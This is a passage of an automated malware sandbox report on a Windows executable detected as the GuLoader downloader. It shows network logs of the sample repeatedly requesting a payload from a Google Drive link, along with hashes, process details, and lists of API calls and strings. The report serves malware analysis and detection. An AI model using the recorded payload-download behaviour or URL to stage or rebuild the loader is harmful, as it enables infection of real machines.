2024-12-03 16:26:58 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:59 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:58 GMT Content-Security-Policy: script-src 'nonce-AwDv4fGpx1CodjAZxGju-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 X-GUploader-UploadID: AFiumC7lRDRY4LukXcieZVLZlEzHLEMOXx6s-vItBjhAUiSaRMO69b6s11pT1M4_d4axgBkRCYcW_P7rnA Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:26:59 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 39 56 55 6e 58 72 61 70 66 34 56 50 37 77 30 34 72 63 70 39 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="k9VUnXrapf4VP7w04rcp9Q">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49987	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:27:01 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:27:02 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:27:01 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-hmCFMNEWAg7Umzot_5ha8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49988	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:27:03 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:27:04 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:27:04 GMT Content-Security-Policy: script-src 'nonce-yB9yYCz8zb4cXKMSspmcuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 X-GUploader-UploadID: AFiumC4hHvH6RYzte-I48Xq0kC0xqUmDeVx-Pd46JFd10TRsgzJJ_UU3rOuX2e9hMfqCFNHEvLb0fqwJdQ Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:27:04 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 6f 7a 35 6f 35 70 51 5a 5a 34 64 31 54 4a 71 32 52 6f 33 57 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="doz5o5pQZZ4d1TJq2Ro3WA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49989	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:27:06 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:27:07 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:27:07 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-0s42-i_EgOw521-LceO1ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Target ID:	0
Start time:	11:23:00
Start date:	03/12/2024
Path:	C:\Users\user\Desktop\eAvqHiIsgR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\eAvqHiIsgR.exe"
Imagebase:	0x400000
File size:	882'600 bytes
MD5 hash:	61518CFDED3109FAC04EE916AB275C26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3670179410.0000000003404000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:24:35
Start date:	03/12/2024
Path:	C:\Users\user\Desktop\eAvqHiIsgR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\eAvqHiIsgR.exe"
Imagebase:	0x400000
File size:	882'600 bytes
MD5 hash:	61518CFDED3109FAC04EE916AB275C26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.4521613318.00000000021F4000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.4%
Total number of Nodes:	1541
Total number of Limit Nodes:	46

Executed Functions

Function 00403348 Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040336D
GetVersion.KERNEL32 ref: 00403373
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
OleInitialize.OLE32(00000000), ref: 004033E9
SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
GetCommandLineA.KERNEL32(sprjtelakeringer Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
CharNextA.USER32(00000000,"C:\Users\user\Desktop\eAvqHiIsgR.exe",00000020,"C:\Users\user\Desktop\eAvqHiIsgR.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9

Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75923410), ref: 004039FA
Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
Part of subcall function 0040390A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E

Part of subcall function 00403830: CloseHandle.KERNEL32(000002CC,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B

OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
ExitProcess.KERNEL32 ref: 00403688
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
ExitProcess.KERNEL32 ref: 0040382A

Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E

Strings

C:\Users\user\Desktop, xrefs: 004036BA, 004036BF, 004036EB
"C:\Users\user\Desktop\eAvqHiIsgR.exe", xrefs: 00403420, 00403426, 004035DD
C:\Users\user\AppData\Local\Temp\, xrefs: 00403548, 0040354D, 00403563, 0040356F, 0040357E, 0040358B, 00403597, 0040359F, 00403698, 004036A9, 004036B4, 004036C0, 004036CD, 004036DC, 0040378B
\Temp, xrefs: 0040356A
Error launching installer, xrefs: 0040361F
C:\Users\user\Desktop\eAvqHiIsgR.exe, xrefs: 00403745
sprjtelakeringer Setup, xrefs: 00403410
~nsu, xrefs: 00403693
TMP, xrefs: 004035A0
.tmp, xrefs: 004036AF
UXTHEME, xrefs: 0040339A, 0040339F, 004033A5
C:\Users\user\tranchet\Trykmaalere, xrefs: 00403644
SeShutdownPrivilege, xrefs: 004037BE
NSIS Error, xrefs: 0040340B
1033, xrefs: 004035B4
C:\Users\user\tranchet, xrefs: 00403538, 00403639, 004036E3, 004036EC
", xrefs: 0040347B
Low, xrefs: 00403586
TEMP, xrefs: 00403598

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\eAvqHiIsgR.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\eAvqHiIsgR.exe$C:\Users\user\tranchet$C:\Users\user\tranchet\Trykmaalere$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$sprjtelakeringer Setup$~nsu
API String ID: 3776617018-824823420
Opcode ID: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
Opcode Fuzzy Hash: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F

Function 72A41A98 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 72A41215: GlobalAlloc.KERNEL32(00000040,72A41233,?,72A412CF,-72A4404B,72A411AB,-000000A0), ref: 72A4121D

GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 72A41BC4
lstrcpyA.KERNEL32(00000008,?), ref: 72A41C0C
lstrcpyA.KERNEL32(00000408,?), ref: 72A41C16
GlobalFree.KERNEL32(00000000), ref: 72A41C29
GlobalFree.KERNEL32(?), ref: 72A41D09
GlobalFree.KERNEL32(?), ref: 72A41D0E
GlobalFree.KERNEL32(?), ref: 72A41D13
GlobalFree.KERNEL32(00000000), ref: 72A41EFA
lstrcpyA.KERNEL32(?,?), ref: 72A42098
GetModuleHandleA.KERNEL32(00000008), ref: 72A42114
LoadLibraryA.KERNEL32(00000008), ref: 72A42125
GetProcAddress.KERNEL32(?,?), ref: 72A4217E
lstrlenA.KERNEL32(00000408), ref: 72A42198

Memory Dump Source

Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true

Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: f2842a349108c84ecb24d60a4aeb7ad3f5c65b8eda0180e0c4f9b8fe325fea61
Instruction ID: f7f5fca2c01b5b150d5e56225510092eeef0f5435b9717fada9ea2778d657285
Opcode Fuzzy Hash: f2842a349108c84ecb24d60a4aeb7ad3f5c65b8eda0180e0c4f9b8fe325fea61
Instruction Fuzzy Hash: D2226B71D4420ADBDB118FACC9807ADBBF5FB49309F20752ED196A2198DF74DA82CB50

Function 004058BF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
FindFirstFileA.KERNELBASE(0042B898,?,?,?,0040A014,?,0042B898,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
FindClose.KERNEL32(00000000), ref: 00405A26

Strings

"C:\Users\user\Desktop\eAvqHiIsgR.exe", xrefs: 004058BF
C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
\*.*, xrefs: 0040592A

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-4106707045
Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A

Function 0040216B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2

Strings

C:\Users\user\tranchet\Trykmaalere, xrefs: 00402230

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\tranchet\Trykmaalere
API String ID: 123533781-1178395610
Opcode ID: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
